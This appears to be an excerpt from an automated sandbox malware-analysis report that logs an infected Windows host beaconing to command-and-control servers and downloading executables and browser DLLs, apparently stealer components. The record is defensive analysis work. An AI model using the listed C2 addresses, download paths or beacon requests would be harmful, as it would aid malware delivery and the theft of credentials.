Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0031BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0031BD60

Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive

Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://pubads.g.doubleclick.net/gampad/xml_vmap2*://pubads.g.doubleclick.net/gampad/xml_vmap1*://.adsafeprotected.com//unit/://.adsafeprotected.com/jsvid?*://.adsafeprotected.com/services/pub://trends.google.com/trends/embed://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php@mozilla.org/binaryoutputstream;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.gstatic.com/firebasejs//firebase-messaging.js**://id.rambler.ru/rambler-id-helper/auth_events.jsTerminatoryTelemetry: Waiting to submit telemetry equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" 